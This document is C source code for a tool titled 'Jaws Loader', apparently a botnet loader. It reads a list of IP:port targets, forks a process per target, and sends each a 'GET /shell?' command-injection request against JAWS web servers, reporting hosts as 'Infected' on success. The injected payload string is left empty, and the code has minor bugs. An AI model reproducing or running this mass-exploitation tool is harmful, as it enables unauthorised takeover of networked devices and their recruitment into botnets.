Jaws Loader

1. #define _GNU_SOURCE
2.  
3. #include <stdio.h>
4. #include <string.h>
5. #include <ctype.h>
6. #include <errno.h>
7. #include <stdlib.h>
8. #include <unistd.h>
9. #include <sys/socket.h>
10. #include <netinet/in.h>
11. #include <arpa/inet.h>
12. #include <sys/types.h>
13. #include <sys/wait.h>
14.  
15. #define INFO "[\x1b[33m?\x1b[37m]"
16. #define SUCCESS "[\x1b[32m+\x1b[37m]"
17. #define ERROR "[\x1b[31m-\x1b[37m]"
18. #define ARRAY_SIZE(Array) sizeof(Array) / sizeof(Array[0])
19.  
20. const char *Payload = "";
21. const char *Success = "listening tun0";
22.  
23. const char *UserAgents[] = {
24.     "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
25.     "Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
26.     "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
27.     "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
28.     "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
29.     "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)",
30.     "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A"
31.     "Opera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16"
32. };
33.  
34. void InfectJAWS(const char* IP, int Port, int Timeout)
35. {
36.     int Socket = -1;
37.     char Vulnerable = 0;
38.     struct sockaddr_in addr;
39.  
40.     struct timeval tv;
41.     tv.tv_sec = Timeout;
42.     tv.tv_usec = 0;
43.  
44.     char Headers[1024];
45.     snprintf(Headers, sizeof(Headers), "GET /shell?%s HTTP/1.1\r\nUser-Agent: %s\r\nHost: %s:%d\r\n" \
46.         "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection: keep-alive\r\n\r\n",
47.         Payload, UserAgents[(rand() % ARRAY_SIZE(UserAgents))], IP, Port);
48.  
49.     if ((Socket = socket(AF_INET, SOCK_STREAM, 0)) == -1)
50.         return;
51.  
52.     if (setsockopt(Socket, SOL_SOCKET, SO_RCVTIMEO, (const char*)&tv, sizeof(struct timeval)) == -1)
53.     {
54.         close(Socket);
55.         return;
56.     }
57.  
58.     addr.sin_family = AF_INET;
59.     addr.sin_addr.s_addr = inet_addr(IP);
60.     addr.sin_port = htons(Port);
61.  
62.     if (connect(Socket, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1)
63.     {
64.         close(Socket);
65.         return;
66.     }
67.  
68.     int Read;
69.     char Recieve[BUFSIZ];
70.  
71.     if (write(Socket, Headers, strlen(Headers)) >= 0)
72.     {
73.         while ((Read = read(Socket, Recieve, sizeof(Recieve))) > 0)
74.         {
75.             Recieve[Read] = '\0';
76.             if (strstr(Recieve, Success) != NULL)
77.             {
78.                 Vulnerable = 1;
79.                 break;
80.             }
81.         }
82.     }
83.  
84.     close(Socket);
85.  
86.     if (Vulnerable)
87.         printf("%s Infected %s:%d\n", SUCCESS, IP, Port);
88. }
89.  
90. char *Trim(char *str)
91. {
92.     int i, Begin = 0;
93.     int End = strlen(str) - 1;
94.  
95.     while (isspace(str[Begin]))
96.         Begin++;
97.     while ((End >= Begin) && isspace(str[End]))
98.         End--;
99.     for (i = Begin; i <= End; i++)
100.         str[i - Begin] = str[i];
101.  
102.     str[i - Begin] = '\0';
103. }
104.  
105. int main(int argc, char const *argv[])
106. {
107.     if (argc != 4)
108.     {
109.         printf("%s Usage: %s <max forks> <ip:port list> <timeout (in seconds)>\n", INFO, argv[0]);
110.         return 1;
111.     }
112.  
113.     int i, Forks = 0;
114.     char Buffer[513];
115.     int MaxForks = atoi(argv[1]);
116.     int Timeout = atoi(argv[3]);
117.     FILE *IPs = fopen(argv[2], "r");
118.  
119.     if (IPs == NULL)
120.     {
121.         printf("%s Failed to open \"%s\"\n", ERROR, argv[1]);
122.         return 1;
123.     }
124.  
125.     printf("%s Running with %d max forks against \"%s\" with a timeout of %d %s\n\n", INFO, MaxForks, argv[2], Timeout, (Timeout > 1 ? "seconds" : "second"));
126.  
127.     while (fgets(Buffer, sizeof(Buffer) - 1, IPs))
128.     {
129.         Trim(Buffer);
130.         if (strlen(Buffer) < 3)
131.             break;
132.  
133.         char *Token = strtok(Buffer, ":");
134.         for (i = 0; i < strlen(Buffer) && Buffer[i] != ':'; i++);
135.  
136.         const char *IP = Buffer;
137.         int Port = atoi(Buffer + i + 1);
138.        
139.         if (!(fork()))
140.         {
141.             InfectJAWS(IP, Port, Timeout);
142.             exit(0);
143.         }
144.         else
145.         {
146.             Forks++;
147.             if (Forks++ > MaxForks)
148.                 for (Forks; Forks > MaxForks; Forks--)
149.                     wait(NULL);
150.         }
151.     }
152.  
153.     return 0;
154. }